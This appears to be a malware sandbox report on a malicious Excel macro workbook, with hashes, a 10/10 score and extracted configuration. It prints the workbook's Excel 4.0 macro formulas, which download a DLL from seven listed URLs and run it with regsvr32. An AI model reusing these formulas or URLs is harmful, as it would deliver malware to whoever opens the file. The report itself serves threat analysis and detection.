General
-
Target
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1
-
Size
20KB
-
Sample
241120-wh41hs1drl
-
MD5
2272673a9ab26a0bea6249d0407f7636
-
SHA1
94d423ae8101c679c3f721b1af8c08f488cfc24a
-
SHA256
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1
-
SHA512
91e01f32be7a6e2ee14b538c6c16e6d3c564956ffc2e5edb44cb29fe55f6b674f1b4b4a4a6dec8d518e71c4f9541afe205b58da3395d36c797589a274f80908e
-
SSDEEP
384:G/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:GtINAo4FLkCBn9kC+xbLzJy
Behavioral task
behavioral1
Sample
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://antaoco.com/wp-admin/5WaIjOuHnUj/
http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
http://andrewpharma.com/wp-includes/WqgKtKrYJM/
http://amkltd.co.uk/amk/IPuhx/
http://gees.com.pl/geessw/2YmxITo6/
http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://antaoco.com/wp-admin/5WaIjOuHnUj/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/WqgKtKrYJM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amkltd.co.uk/amk/IPuhx/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gees.com.pl/geessw/2YmxITo6/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Extracted
http://antaoco.com/wp-admin/5WaIjOuHnUj/
http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
http://andrewpharma.com/wp-includes/WqgKtKrYJM/
http://amkltd.co.uk/amk/IPuhx/
http://gees.com.pl/geessw/2YmxITo6/
http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/
Extracted
http://antaoco.com/wp-admin/5WaIjOuHnUj/
http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
http://andrewpharma.com/wp-includes/WqgKtKrYJM/
http://amkltd.co.uk/amk/IPuhx/
http://gees.com.pl/geessw/2YmxITo6/
Targets
-
-
Target
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1
-
Size
20KB
-
MD5
2272673a9ab26a0bea6249d0407f7636
-
SHA1
94d423ae8101c679c3f721b1af8c08f488cfc24a
-
SHA256
4737df28e330a5e7a77110b02c1d90f060a9072704142d93eb14bb43c7aae7c1
-
SHA512
91e01f32be7a6e2ee14b538c6c16e6d3c564956ffc2e5edb44cb29fe55f6b674f1b4b4a4a6dec8d518e71c4f9541afe205b58da3395d36c797589a274f80908e
-
SSDEEP
384:G/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:GtINAo4FLkCBn9kC+xbLzJy
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-